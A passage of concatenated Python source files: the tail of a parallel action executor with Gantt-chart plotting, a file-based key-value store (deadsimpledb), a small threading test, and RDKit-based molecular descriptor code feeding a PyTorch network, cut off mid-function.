return self.__cancel_time if self.__ready_time is None else self.__ready_time
@property
def max_time(self):
return self.__cancel_time
def draw(self, ax, ordinates, actions):
ordinate = ordinates[self.__id]
if self.__ready_time: # Not doctested: implementation detail
ax.plot([self.__ready_time, self.__cancel_time], [ordinate, ordinate], color="grey", lw=1)
if self.__label is not None:
ax.annotate(
self.__label,
xy=(self.__cancel_time, ordinate), xytext=(0, 3), textcoords="offset points",
color="grey",
)
for d in self.__dependencies:
ax.plot([actions[d].max_time, self.min_time], [ordinates[d], ordinate], "k:", lw=1)
@classmethod
def __make_action(cls, action, status):
if status.status == SUCCESSFUL:
return cls.SuccessfulAction(action, status)
elif status.status == FAILED:
return cls.FailedAction(action, status)
elif status.status == CANCELED:
return cls.CanceledAction(action, status)
def write_to_png(self, filename):
"""
Write the Gantt chart as a PNG image to the specified file.
See also :meth:`get_mpl_figure` and :meth:`plot_on_mpl_axes` if you want to draw the report somewhere else.
"""
import matplotlib.backends.backend_agg
figure = self.get_mpl_figure()
canvas = matplotlib.backends.backend_agg.FigureCanvasAgg(figure)
canvas.print_figure(filename)
def get_mpl_figure(self):
"""
Return a :class:`matplotlib.figure.Figure` of this Gantt chart.
See also :meth:`plot_on_mpl_axes` if you want to draw the Gantt chart on your own matplotlib figure.
See also :meth:`write_to_png` for the simplest use-case.
"""
import matplotlib.figure
fig = matplotlib.figure.Figure()
ax = fig.add_subplot(1, 1, 1)
self.plot_on_mpl_axes(ax)
return fig
@staticmethod
def __nearest(v, values): # Not doctested: implementation detail
for i, value in enumerate(values):
if v < value:
break
if i == 0:
return values[0]
else:
if v - values[i - 1] <= values[i] - v:
return values[i - 1]
else:
return values[i]
__intervals = [
1, 2, 5, 10, 15, 30, 60,
2 * 60, 10 * 60, 30 * 60, 3600,
2 * 3600, 3 * 3600, 6 * 3600, 12 * 3600, 24 * 3600,
]
def plot_on_mpl_axes(self, ax):
"""
Plot this Gantt chart on the provided :class:`matplotlib.axes.Axes`.
See also :meth:`write_to_png` and :meth:`get_mpl_figure` for the simpler use-cases.
"""
import matplotlib.dates
for action in self.__actions.itervalues():
action.draw(ax, self.__ordinates, self.__actions)
ax.get_yaxis().set_ticklabels([])
ax.set_ylim(0.5, len(self.__actions) + 1)
min_time = min(a.min_time for a in self.__actions.itervalues()).replace(microsecond=0)
max_time = (
max(a.max_time for a in self.__actions.itervalues()).replace(microsecond=0) +
datetime.timedelta(seconds=1)
)
duration = int((max_time - min_time).total_seconds())
ax.set_xlabel("Local time")
ax.set_xlim(min_time, max_time)
ax.xaxis_date()
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S"))
ax.xaxis.set_major_locator(matplotlib.dates.AutoDateLocator(maxticks=4, minticks=5))
ax2 = ax.twiny()
ax2.set_xlabel("Relative time")
ax2.set_xlim(min_time, max_time)
ticks = range(0, duration, self.__nearest(duration // 5, self.__intervals))
ax2.xaxis.set_ticks([min_time + datetime.timedelta(seconds=s) for s in ticks])
ax2.xaxis.set_ticklabels(ticks)
class _Execute(object):
def __init__(self, cpu_cores, keep_going, do_raise, hooks):
self.cpu_cores = cpu_cores
self.keep_going = keep_going
self.do_raise = do_raise
self.hooks = hooks
def run(self, root_action):
now = datetime.datetime.now()
# Pre-process actions
self._check_picklability(root_action)
actions = root_action.get_possible_execution_order()
self.actions_by_id = {id(action): action for action in actions}
self.dependents = {action: set() for action in actions}
for action in actions:
for dependency in action.dependencies:
self.dependents[dependency].add(action)
# Misc stuff
self.report = ExecutionReport(root_action, actions, now)
for action in actions:
self.hooks.action_pending(now, action)
self.events = multiprocessing.Queue()
self.exceptions = []
self.resources_used = {}
# Actions by status
self.pending = set(actions)
self.ready = set()
self.running = set()
self.done = set()
for action in actions:
if not action.dependencies:
self._prepare_action(action, now)
# Execute
while self.pending or self.ready or self.running:
self._progress(now)
now = datetime.datetime.now()
for w in multiprocessing.active_children():
w.join()
if self.do_raise and self.exceptions: # Not doctested: @todoc
raise CompoundException(self.exceptions, self.report)
else:
return self.report
def _cancel_action(self, action, now):
self.report.get_action_status(action)._set_cancel_time(now)
self.hooks.action_canceled(now, action)
if action in self.pending:
self._change_status(action, self.pending, self.done)
else: # Not doctested: implementation detail
self._change_status(action, self.ready, self.done)
if not self.keep_going: # Not doctested: implementation detail
for d in action.dependencies:
if d in self.pending or d in self.ready:
self._cancel_action(d, now)
self._triage_pending_dependents(action, True, now)
def _triage_pending_dependents(self, action, failed, now):
for dependent in self.pending & self.dependents[action]:
if failed and not dependent.accept_failed_dependencies:
self._cancel_action(dependent, now)
elif all(d in self.done for d in dependent.dependencies):
self._prepare_action(dependent, now)
def _prepare_action(self, action, now):
self.report.get_action_status(action)._set_ready_time(now)
self.hooks.action_ready(now, action)
self._change_status(action, self.pending, self.ready)
def _progress(self, now):
# @todo Should we tweak the scheduling?
# We could prioritize the actions that use many resources,
# hoping that this would avoid idle CPU cores at the end of the execution.
# Scheduling is a hard problem, we may just want to keep the current, random, behavior.
for action in set(self.ready):
if self._allocate_resources(action):
self._start_action(action, now)
self._handle_next_event()
def _allocate_resources(self, action):
for (resource, quantity) in action.resources_required:
used = self.resources_used.setdefault(resource, 0)
if used == 0:
# Allow actions requiring more than available to run when they are alone requiring this resource
continue
availability = resource._availability(self.cpu_cores)
if availability is UNLIMITED: # Not doctested: implementation detail
# Don't check usage of unlimited resources
continue
if used + quantity > availability:
return False
for (resource, quantity) in action.resources_required:
self.resources_used[resource] += quantity
return True
def _start_action(self, action, now):
self.report.get_action_status(action)._set_start_time(now)
self.hooks.action_started(now, action)
dependency_statuses = {d: self.report.get_action_status(d) for d in action.dependencies}
p = multiprocessing.Process(
target=self._run_action,
kwargs=dict(action=action, action_id=id(action), dependency_statuses=dependency_statuses)
)
p.start()
self._change_status(action, self.ready, self.running)
def _run_action(self, action, action_id, dependency_statuses):
return_value = exception = None
(pipe_r, pipe_w) = os.pipe()
sys.stdout.flush()
libc.fflush(stdout)
os.dup2(pipe_w, 1)
sys.stderr.flush()
libc.fflush(stderr)
os.dup2(pipe_w, 2)
os.close(pipe_w)
thread = threading.Thread(target=self._read_to_events, kwargs=dict(action_id=action_id, pipe_r=pipe_r))
thread.daemon = True
thread.start()
try:
return_value = action.do_execute(dependency_statuses)
except BaseException as e:
exception = e
sys.stdout.flush()
libc.fflush(stdout)
os.close(1)
sys.stderr.flush()
libc.fflush(stderr)
os.close(2)
thread.join()
os.close(pipe_r)
try:
self._check_picklability((exception, return_value))
except: # Not doctested: mandatory picklability is more an issue than a feature
self.events.put((PICKLING_EXCEPTION, action_id, ()))
else:
end_time = datetime.datetime.now()
if exception:
self.events.put((FAILED, action_id, (end_time, exception)))
else:
self.events.put((SUCCESSFUL, action_id, (end_time, return_value)))
def _read_to_events(self, action_id, pipe_r):
while True:
data = os.read(pipe_r, 1024)
if len(data) == 0:
break
self.events.put((PRINTED, action_id, (datetime.datetime.now(), data)))
def _check_picklability(self, stuff):
# This is a way to fail fast if we see a non-picklable object
# because ProcessPoolExecutor freezes forever if we try to transfer
# a non-picklable object through its queues
pickle.loads(pickle.dumps(stuff))
def _handle_next_event(self):
(event_kind, action_id, event_payload) = self.events.get()
handlers = {
SUCCESSFUL: self._handle_successful_event,
PRINTED: self._handle_printed_event,
FAILED: self._handle_failed_event,
PICKLING_EXCEPTION: self._handle_pickling_exception_event,
}
handlers[event_kind](self.actions_by_id[action_id], *event_payload)
def _handle_successful_event(self, action, success_time, return_value):
self.report.get_action_status(action)._set_success(success_time, return_value)
self.hooks.action_successful(success_time, action, return_value)
self._change_status(action, self.running, self.done)
self._triage_pending_dependents(action, False, success_time)
self._deallocate_resources(action)
def _handle_printed_event(self, action, print_time, data):
self.report.get_action_status(action)._add_output(data)
self.hooks.action_printed(print_time, action, data)
def _handle_failed_event(self, action, failure_time, exception):
self.report.get_action_status(action)._set_failure(failure_time, exception)
self.hooks.action_failed(failure_time, action, exception)
self._change_status(action, self.running, self.done)
self.exceptions.append(exception)
self._triage_pending_dependents(action, True, failure_time)
self._deallocate_resources(action)
def _handle_pickling_exception_event(self, action): # Not doctested: mandatory picklability
raise pickle.PicklingError()
def _change_status(self, action, orig, dest):
orig.remove(action)
dest.add(action)
def _deallocate_resources(self, action):
for (resource, quantity) in action.resources_required:
self.resources_used[resource] = max(0, self.resources_used[resource] - quantity)
|
deadsimpledb.py
|
import logging
import csv
import os
import pickle
import shutil
import time
from typing import Any, Dict, List, Tuple
import copy
import numpy as np
import PIL.Image
import simplejson as json
from os.path import isfile, join
import threading
from multiprocessing import Process
# from multiprocessing import SimpleQueue as Queue
from multiprocessing import Queue
# from queue import SimpleQueue as Queue
SUPPORTED_FILE_TYPES = ['png', 'jpg', 'pkl', 'json', 'csv']
class JSONEncoderDefault(json.JSONEncoder):
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
if obj.size() > 1000:
return "REDACTED: NUMPY OBJ OF SIZE {} TOO LARGE".format(obj.size())
else:
return obj.tolist()
else:
try:
return super(JSONEncoderDefault, self).default(obj)
except Exception as e:
return "ENCODE_FAILED:{}_AS_STR:{}".format(type(obj),obj)
class JSONDecoderDefault(json.JSONDecoder):
def __init__(self, *args, **kwargs):
json.JSONDecoder.__init__(
self, object_hook=self.object_hook, *args, **kwargs)
def object_hook(self, obj): # pylint: disable=E0202
return obj
def format_key(key):
if type(key) is str:
return (key,)
else:
return tuple([str(k) for k in key])
def get_filetype(filepath_prefix):
for ft in SUPPORTED_FILE_TYPES:
if os.path.exists(filepath_prefix + "." + ft):
return ft
return None
def path_to_key_name_stype(root_path, full_file_path, sep="/"):
if not root_path.endswith(sep):
root_path = root_path + sep
if len(root_path)>1:
full_file_path = full_file_path.replace(root_path,"",1)
if full_file_path.startswith(sep):
full_file_path=full_file_path[1:]
fpath, stype = os.path.splitext(full_file_path)
path_parts = fpath.split(sep)
name = path_parts[-1]
path_parts = path_parts[:-1]
key = format_key(path_parts)
return key, name, stype[1:]
class DeadSimpleDB:
def __init__(self,
root_path=None,
overwrite=False,
json_encoder=JSONEncoderDefault,
json_decoder=JSONDecoderDefault,
read_only=False,
use_write_thread=True,
check_file_last_updated = True): ## this is a write optmization
self.json_encoder = json_encoder
self.json_decoder = json_decoder
if root_path is None:
root_path = "deadsimpledb"
self.root_path = root_path
if overwrite:
logging.info("Overwrite enabled...")
if os.path.exists(self.root_path):
logging.info(
".... Removing directory {}".format(self.root_path))
shutil.rmtree(self.root_path)
else:
logging.info("No folder exists, not overwriting")
if not os.path.exists(self.root_path):
os.makedirs(self.root_path)
self.read_only = read_only
self.running = True
if self.read_only:
self.use_write_thread = False
self.check_file_last_updated = check_file_last_updated
self.data_store: Dict[str, Dict[str, Any]] = {}
self.cache: Dict[str, Dict[str, Any]] = {}
self.use_write_thread = use_write_thread
if self.use_write_thread:
self.write_queue= Queue()
self.writer_thread = threading.Thread(target=self._process_write_requests, args=())
self.writer_thread.daemon = True
self.writer_thread.start()
else:
print("Not using write thread")
def _process_write_requests(self):
print("Write Thread initialized")
running = True
t = threading.currentThread()
while running:
try:
key,name,value,stype = self.write_queue.get(timeout=3)
try:
self._write(key,value,name,stype)
except Exception as e:
print("Exception while writing for root_path:{}, key:{}, name: {} --- {}".format(self.root_path,key,name,e))
except Exception as e:
pass
running = getattr(t, "running", True)
if not running and not self.write_queue.empty():
running = True
def check_path(self, path):
if not os.path.exists(path):
os.makedirs(path, exist_ok=True)
def update_dict(self, key, value, name='data', stype="json", clear_cache=False):
key = format_key(key)
value_dict = self.get(key, name, stype=stype)
if value_dict is None:
value_dict = {}
value_dict.update(value)
self.save(key, name=name, value=value_dict, stype=stype, clear_cache=clear_cache)
else:
value_dict.update(value)
self._flush(key, name, clear_cache)
def remove_items_from_dict(self, key, items, name='data', stype="json", clear_cache=False):
key = format_key(key)
value_dict = self.get(key, name, stype=stype)
if value_dict is None:
return
for item in items:
value_dict.pop(item, None)
self._flush(key, name, clear_cache)
def append_to_list(self, key, value, name='data', stype="json", clear_cache=False):
key = format_key(key)
value_list = self.get(key, name, stype=stype)
if value_list is None:
value_list = []
value_list.append(value)
self.save(key, name=name, value=value_list, stype=stype, clear_cache=clear_cache)
else:
value_list.append(value)
self._flush(key, name, clear_cache)
def get_multipart_list(self,
key,
name="data",
start_idx = 0,
end_idx = None):
manifest_name = "{}__{}".format(name, "manifest")
manifest = self.get(key = key, name = manifest_name)
if manifest is None:
return None
start_idx = start_idx
end_idx = end_idx if end_idx else manifest['parts_index'] +1
value_list = []
for i in range(start_idx,end_idx):
part_name = "{}__part{}".format(name, i)
value_list_part = self.get(key=key, name=part_name,stype='json')
if value_list_part is not None:
value_list.extend(value_list_part)
else:
print("no data found1")
return value_list
def append_to_multipart_list(self,
key,
value: Any,
name="data"):
if type(value) is np.ndarray:
value = np.asscalar(value)
manifest_name = "{}__{}".format(name, "manifest")
manifest = self.get(key, manifest_name, stype="json")
if manifest is None:
manifest = {}
manifest['chunksize'] = 500
manifest['parts_index'] = 0
self.save(key=key, name=manifest_name, value=manifest)
part_name = "{}__part{}".format(name, manifest['parts_index'])
value_list = self.get(key=key, name=part_name)
if value_list is None:
value_list = []
self.save(key, name=part_name, value=value_list, stype='json')
value_list.append(value)
is_full = len(value_list) >= manifest['chunksize']
self.save(key, name=part_name, value=value_list, stype='json')
if is_full:
manifest['parts_index'] += 1
new_part_name = "{}__part{}".format(name, manifest['parts_index'])
self.save(key=key, name=new_part_name, value=[], stype='json')
self.save(key=key, name=manifest_name, value=manifest)
def save(self, key, value, name='data', stype="json", clear_cache=False, last_updated=None, flush=True):
key = format_key(key)
items = self.data_store.get(key, None)
if items is None:
items = {}
self.data_store[key] = items
items[name] = {
'key': key,
'value': value,
'name': name,
'last_updated': last_updated, # file updated
'stype': stype}
if flush:
self._flush(key, name, clear_cache)
def list(self,key, use_cache=False):
#TODO: add list cache
key = format_key(key)
names = []
subkeys = []
path = self._get_path_from_key(key)
for fname in os.listdir(path):
if isfile(os.path.join(path, fname)):
name = os.path.splitext(fname)[0]
stype = os.path.splitext(fname)[1]
if name.endswith("_tmp"):
continue
names.append(name)
else:
subkeys.append(fname)
return names, subkeys
def list_keys_stream(self,key, use_cache=False):
#TODO: add list cache
key = format_key(key)
path = self._get_path_from_key(key)
for fname in os.listdir(path):
if not isfile(os.path.join(path, fname)):
yield fname
def list_objects_with_name_stream(self,key,name):
key = format_key(key)
for col in self.list_keys_stream(key):
fullkey = key + (col,)
obj = self.get(fullkey,name)
if obj is not None:
yield (col,obj)
def list_objects_with_name(self,key,name):
key = format_key(key)
names, subkeys = self.list(key)
print("Done listing")
objects = []
for col in subkeys:
fullkey = key + (col,)
obj = self.get(fullkey,name)
if obj is not None:
objects.append((col,obj))
return objects
def list_objects(self,key):
key = format_key(key)
names, subkeys = self.list(key)
objects = []
for name in names:
obj = self.get(key,name)
if obj is not None:
objects.append((name,obj))
return objects
def get(self, key, name="data", stype=None, refresh=False):
key = format_key(key)
items = self.data_store.get(key, None)
if self.check_file_last_updated:
file_last_updated = self._file_last_updated( key, name=name, stype=stype)
else:
file_last_updated = None
if not refresh and items is not None and name in items:
entry = items.get(name)
cached_last_updated = entry.get('last_updated',None)
# Return data from cache if ...
if file_last_updated is None or cached_last_updated is None or file_last_updated <= cached_last_updated:
data = entry.get('value')
if data is not None:
return data
# read data from file
data, stype = self._read(key, name, stype)
if data is None:
return None
self.save(key, data,
name=name,
stype=stype,
last_updated=file_last_updated,
flush=False)
return data
def delete(self, key, name="data", stype=None):
#TODO Fix slow deletes
key = format_key(key)
self.flush_all()
items = self.data_store.get(key)
path = self._get_path_from_key(key)
#Remove file from disk
if name is not None:
items.pop(name,None)
filepath_prefix = os.path.join(path, "{}".format(name))
if stype is None:
stype = get_filetype(filepath_prefix)
#raise Exception("Not found")
if stype is not None:
filepath = os.path.join(path, "{}.{}".format(name, stype.lower()))
if os.path.isfile(filepath):
os.remove(filepath)
#Remove path
if items is None or len(items) == 0:
# Remove Path From memory
self.data_store.pop(key,None)
# If path is empty
if len(os.listdir(path)) == 0:
try:
if not os.path.isfile(path):
os.rmdir(path=os.path.join(os.getcwd(),path))
except Exception as e:
print(e)
if len(key) > 1:
self.delete(key[:-1],name=None)
def prepvalue(self,value):
return value
def _flush(self, key, name='data', clear_cache=False):
if self.read_only:
return "not flushing {} {}".format(key,name)
elif self.use_write_thread:
# self._write_to_q((key,name,clear_cache))
if self.read_only:
return
items = self.data_store[key]
entry = items.get(name)
if entry is not None:
value = entry['value']
if clear_cache:
entry['value'] = None
# self._write(key, name=name, value=value, stype=entry['stype'])
self.write_queue.put((key,name,self.prepvalue(value),entry['stype']))
else:
self._flush_sync(key,name,clear_cache)
def delayed_write(self,key,name,value,stype):
if self.use_write_thread:
self.write_queue.put((key,name,self.prepvalue(value),stype))
else:
raise Exception("Delayed write not supported with use_write_thread=False")
def delayed_write_by_path(self,value,path):
key,name,stype = path_to_key_name_stype(self.root_path, path)
self.delayed_write(key,name,value,stype)
def _flush_sync(self, key, name='data', clear_cache=False):
if self.read_only:
return
items = self.data_store[key]
entry = items.get(name)
if entry is not None:
value = entry['value']
if clear_cache:
entry['value'] = None
self._write(key, name=name, value=value, stype=entry['stype'])
async def _flush_async(self, key, name='data', clear_cache=False):
if self.read_only:
return
items = self.data_store[key]
entry = items.get(name)
if entry is not None:
value = entry['value']
if clear_cache:
entry['value'] = None
self._write(key, name=name, value=value, stype=entry['stype'])
def _get_path_from_key(self, key):
if type(key) is tuple:
path_parts = [str(k) for k in [self.root_path] + list(key)]
else:
path_parts = [str(k) for k in [self.root_path] + [key]]
path = os.path.join(*path_parts)
self.check_path(path)
return path
def close(self):
if self.read_only:
return
if self.use_write_thread:
self.writer_thread.running = False
self.writer_thread.join()
else:
return
def flush_all(self):
if self.read_only:
return
if self.use_write_thread:
flushed = False
while not flushed:
if self.write_queue.qsize() == 0:
return
self.writer_thread.join()
else:
return
def _write(self, key, value, name='data', stype="json"):
"""
saves value to file
TODO: add autohandling of file type
"""
if self.read_only:
return
path = self._get_path_from_key(key)
filepath = os.path.join(path, "{}.{}".format(name, stype.lower()))
filepath_tmp = os.path.join(
path, "{}_tmp.{}".format(name, stype.lower()))
try:
if stype == "json":
with open(filepath_tmp, 'w') as f:
json.dump(value, f, ignore_nan=True, cls=self.json_encoder)
elif stype == "pkl":
with open(filepath_tmp, 'wb') as f:
pickle.dump(value, f)
elif stype == "png" or stype == "jpg":
if type(value) == np.ndarray:
im = PIL.Image.fromarray(value)
else:
im = value
im.save(filepath_tmp)
elif stype == "csv":
with open(filepath_tmp, 'w') as f:
writer = csv.writer(f, delimiter='\t',
quotechar='|',
quoting=csv.QUOTE_MINIMAL)
writer.writerows(value)
else:
with open(filepath_tmp, 'w') as f:
f.write(value)
shutil.copyfile(filepath_tmp, filepath)
os.remove(filepath_tmp)
except Exception as e:
print("Error key:{} name:{} type:{}".format(key,name,type(value)))
print("\t{}".format(value))
raise e
def _file_last_updated(self, key, name="data", stype=None):
path = self._get_path_from_key(key)
filepath_prefix = os.path.join(path, "{}".format(name))
if stype is None:
stype = get_filetype(filepath_prefix)
if stype is None:
return None
filepath = filepath_prefix + "." + stype.lower()
if os.path.isfile(filepath):
return os.path.getmtime(filepath)
else:
return None
def _read(self, key, name="data", stype=None, default_value=None):
path = self._get_path_from_key(key)
filepath_prefix = os.path.join(path, "{}".format(name))
if stype is None:
stype = get_filetype(filepath_prefix)
if stype is None:
return None, None
filepath = filepath_prefix + "." + stype.lower()
try:
if not os.path.isfile(filepath):
return default_value, stype
if stype.lower() == "json":
with open(filepath, 'r') as f:
value = json.load(f, cls=self.json_decoder)
elif stype == "pkl":
with open(filepath, 'rb') as f:
value = pickle.load(f)
elif stype == "csv":
value = []
with open(filepath, 'r') as f:
reader = csv.reader(f, delimiter='\t', quotechar='|')
for line in reader:
value.append(line)
else:
raise Exception("Unsupported format {}".format(stype))
except Exception as e:
print("Error reading key:{}, name:{}, stype:{}".format(key,name,stype))
print("Exception = {}".format(e))
return None,None
return value, stype
|
PointTest.py
|
# test point
import src.Point as Point
from threading import Thread
def prod(point):
for i in range(9):
point.set(i, i)
def cons(point):
for i in range(9):
print(point.get())
test_point = Point.Point()
pro = Thread(target=prod, args=[test_point])
con = Thread(target=cons, args=[test_point])
pro.start()
con.start()
|
NN.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 31 19:25:08 2021
@author: akshat
"""
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import rdkit
from rdkit import Chem
from rdkit import RDLogger
from rdkit.Chem import Descriptors
RDLogger.DisableLog('rdApp.*')
import pickle
import inspect
from collections import OrderedDict
import multiprocessing
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def get_rot_bonds_posn(mol):
'''Return atom indices with Rotatable bonds
Examples:
>>> get_rot_bonds_posn('CC1=CC=CC=C1') # Toluene (Rotatable Bonds At: CH3 & Benzene)
((0, 1),)
>>> get_rot_bonds_posn('CCC1=CC=CC=C1') # (Rotatable Bonds At: CH3, CH3 & Benzene)
((0, 1), (1, 2))
'''
RotatableBond = Chem.MolFromSmarts('*-&!@*')
rot = mol.GetSubstructMatches(RotatableBond)
return rot
def get_bond_indeces(mol, rot):
'''Get all the bond indices with Rotatable bonds atoms (generated from 'get_rot_bonds_posn')
'''
bonds_idx = []
for i in range(len(rot)):
bond = mol.GetBondBetweenAtoms(rot[i][0],rot[i][1])
bonds_idx.append(bond.GetIdx())
return bonds_idx
def obtain_rings(smi):
'''Obtain a list of all rings present in SMILE string smi
Examples:
>>> obtain_rings('CCC1=CC=CC=C1')
['c1ccccc1']
>>> obtain_rings('C1=CC=C(C=C1)C1=CC=CC=C1')
['c1ccccc1', 'c1ccccc1']
>>> obtain_rings('C1=CC2=C(C=C1)C=CC=C2')
(None, None)
Parameters:
smi (string) : SMILE string of a molecule
Returns
(list) : List if all rings in a SMILE string
'''
mol = Chem.MolFromSmiles(smi)
rot = get_rot_bonds_posn(mol) # Get rotatble bond positions
if len(rot) == 0:
return None, None
bond_idx = get_bond_indeces(mol, rot)
new_mol = Chem.FragmentOnBonds(mol, bond_idx, addDummies=False)
new_smile = Chem.MolToSmiles(new_mol)
smile_split_list = new_smile.split(".")
rings = []
for item in smile_split_list:
if '1' in item:
rings.append(item)
return rings
def count_atoms(mol, atomic_num):
'''Count the number of atoms in mol with atomic number atomic_num
Parameters:
mol (rdkit.Chem.rdchem.Mol) : Molecule in which search is conducted
atomic_num (int) : Counting is done in mol for atoms with this atomic number
Returns:
(int) : final count of atom
'''
pat = Chem.MolFromSmarts("[#{}]".format(atomic_num))
return len(mol.GetSubstructMatches(pat))
def get_num_bond_types(mol):
'''Calculate the ratio of total number of (single, double, triple, aromatic) bonds to the
total number of bonds.
Parameters:
mol (rdkit.Chem.rdchem.Mol) : Molecule for which ratios arre retuned
Returns:
(list): [num_single/num_bonds, num_double/num_bonds, num_triple/num_bonds, num_aromatic/num_bonds]
'''
bonds = mol.GetBonds()
num_bonds = 0
num_double = 0
num_triple = 0
num_single = 0
num_aromatic = 0
for b in bonds:
num_bonds += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.SINGLE:
num_single += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.DOUBLE:
num_double += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.TRIPLE:
num_triple += 1
if b.GetBondType() == rdkit.Chem.rdchem.BondType.AROMATIC:
num_aromatic += 1
if num_bonds == 0:
return [0, 0, 0, 0]
else:
return [num_single/num_bonds, num_double/num_bonds, num_triple/num_bonds, num_aromatic/num_bonds]
def count_conseq_double(mol):
'''Return the number of consequtive double bonds in an entire molecule
including rings
Examples
>>> count_conseq_double(Chem.MolFromSmiles('C1=CC=C=C=C1'))
2
>>> count_conseq_double(Chem.MolFromSmiles('C1=CC=CC=C1'))
0
>>> count_conseq_double(Chem.MolFromSmiles('C1=CC2=C(C=C1)C=C=C=C2'))
2
Parameters:
mol (rdkit.Chem.rdchem.Mol) : Molecule for conseq. double bonds are to be counted
Returns:
(int): The integer number of coseq. double bonds
'''
bonds = mol.GetBonds()
previous_BType = None
count_conseq_doub = 0
for b in bonds:
curr_BType = b.GetBondType()
if previous_BType == curr_BType and curr_BType == rdkit.Chem.rdchem.BondType.DOUBLE:
count_conseq_doub += 1
previous_BType = curr_BType
return count_conseq_doub
def size_ring_counter(ring_ls):
'''Get the number of rings of sizes 3 to 20 and the number of consequtive double bonds in a ring
Parameters:
ring_ls (list) : list of rings of a molecule
Returns
(list) : Of size 19 (1 for number of conseq. double bonds)
(18 for number of rings between size 3 to 20)
'''
ring_counter = []
if ring_ls == (None, None): # Presence of no rings, return 0s for the 19 feature
return [0 for i in range(19)]
mol_ring_ls = [Chem.MolFromSmiles(smi) for smi in ring_ls]
# Cont number consequtive double bonds in ring
conseq_dbl_bnd_in_ring = 0
for item in mol_ring_ls:
conseq_dbl_bnd_in_ring += count_conseq_double(item)
ring_counter.append(conseq_dbl_bnd_in_ring) # concatenate onto list ring_counter
# Count the number of consequtive double bonds in rings
for i in range(3, 21):
count = 0
for mol_ring in mol_ring_ls:
if mol_ring.GetNumAtoms() == i:
count += 1
ring_counter.append(count)
return ring_counter
def get_mol_info(smi):
''' Calculate a set of 51 RdKit properties, collected from above helper functions.
Parameters:
smi (string) : SMILE string of molecule
Returns:
(list of float) : list of 51 calculated properties
'''
mol = Chem.MolFromSmiles(smi)
num_atoms = mol.GetNumAtoms()
num_hydro = Chem.AddHs(mol).GetNumAtoms() - num_atoms
num_carbon = count_atoms(mol, 6)
num_nitro = count_atoms(mol, 7)
num_sulphur = count_atoms(mol, 16)
num_oxy = count_atoms(mol, 8)
num_clorine = count_atoms(mol, 17)
num_bromine = count_atoms(mol, 35)
num_florine = count_atoms(mol, 9)
if num_carbon == 0: # Avoid division by zero error, set num_carbon to a very small value
num_carbon = 0.0001
basic_props = [num_atoms/num_carbon, num_hydro/num_carbon, num_nitro/num_carbon,
num_sulphur/num_carbon, num_oxy/num_carbon, num_clorine/num_carbon,
num_bromine/num_carbon, num_florine/num_carbon]
to_caculate = ["RingCount", "HallKierAlpha", "BalabanJ", "NumAliphaticCarbocycles","NumAliphaticHeterocycles",
"NumAliphaticRings","NumAromaticCarbocycles","NumAromaticHeterocycles",
"NumAromaticRings","NumHAcceptors","NumHDonors","NumHeteroatoms",
"NumRadicalElectrons","NumSaturatedCarbocycles","NumSaturatedHeterocycles",
"NumSaturatedRings","NumValenceElectrons"]
# Calculate all propoerties listed in 'to_calculate'
calc_props = OrderedDict(inspect.getmembers(Descriptors, inspect.isfunction))
for key in list(calc_props.keys()):
if key.startswith('_'):
del calc_props[key]
continue
if len(to_caculate)!=0 and key not in to_caculate:
del calc_props[key]
features = [val(mol) for key,val in calc_props.items()] # List of properties
# Ratio of total number of (single, double, triple, aromatic) bonds to the total number of bonds.
simple_bond_info = get_num_bond_types(mol)
# Obtain all rings in a molecule and calc. #of triple bonds in rings & #of rings in molecule
ring_ls = obtain_rings(smi)
num_triple = 0 # num triple bonds in ring
if len(ring_ls) > 0 and ring_ls != (None, None):
for item in ring_ls:
num_triple += item.count('#')
simple_bond_info.append(len(ring_ls)) # append number of Rings in molecule
else: simple_bond_info.append(0) # no rotatable bonds
simple_bond_info.append(num_triple) # number of triple bonds in rings
# Calculate the number of rings of size 3 to 20 & number of conseq. double bonds in rings
simple_bond_info = simple_bond_info + size_ring_counter(ring_ls)
# Calculate the number of consequitve double bonds in entire molecule
simple_bond_info.append(count_conseq_double(mol))
return np.array(features + basic_props + simple_bond_info)
def get_mult_mol_info_parr(smiles_list, dataset_x):
''' Record calculated rdkit property results for each smile in smiles_list,
and add record result in dictionary dataset_x.
'''
for smi in smiles_list:
dataset_x['properties_rdkit'][smi] = get_mol_info(smi)
def get_chunks(arr, num_processors, ratio):
"""
Get chunks based on a list
"""
chunks = [] # Collect arrays that will be sent to different processorr
counter = int(ratio)
for i in range(num_processors):
if i == 0:
chunks.append(arr[0:counter])
if i != 0 and i<num_processors-1:
chunks.append(arr[counter-int(ratio): counter])
if i == num_processors-1:
chunks.append(arr[counter-int(ratio): ])
counter += int(ratio)
return chunks
def create_parr_process(chunks):
'''This function initiates parallel execution (based on the number of cpu cores)
to calculate all the properties mentioned in 'get_mol_info()'
Parameters:
chunks (list) : List of lists, contining smile strings. Each sub list is
sent to a different process
dataset_x (dict): Locked dictionary for recording results from different processes.
Locking allows communication between different processes.
Returns:
None : All results are recorde in dictionary 'dataset_x'
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
# manager = multiprocessing.Manager()
# lock = multiprocessing.Lock()
for chunk in chunks: # process initialization
dataset_x = manager.dict(lock=True)
smiles_map_props = manager.dict(lock=True)
dataset_x['properties_rdkit'] = smiles_map_props
collect_dictionaries.append(dataset_x)
process_collector.append(multiprocessing.Process(target=get_mult_mol_info_parr, args=(chunk, dataset_x, )))
for item in process_collector: # initite all process
item.start()
for item in process_collector: # wait for all processes to finish
item.join()
combined_dict = {}
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item['properties_rdkit'])
return combined_dict
def obtain_discr_encoding(molecules_here, num_processors):
dataset_x = []
for smi in molecules_here:
dataset_x.append(get_mol_info(smi))
return np.array(dataset_x)
class Net(torch.nn.Module):
def __init__(self, n_feature, h_sizes, n_output):
super(Net, self).__init__()
# Layers
self.hidden = nn.ModuleList()
for k in range(len(h_sizes)-1):
self.hidden.append(nn.Linear(h_sizes[k], h_sizes[k+1]))
self.predict = torch.nn.Linear(h_sizes[-1], n_output)
def forward(self, x):
for layer in self.hidden:
x = torch.sigmoid(layer(x))
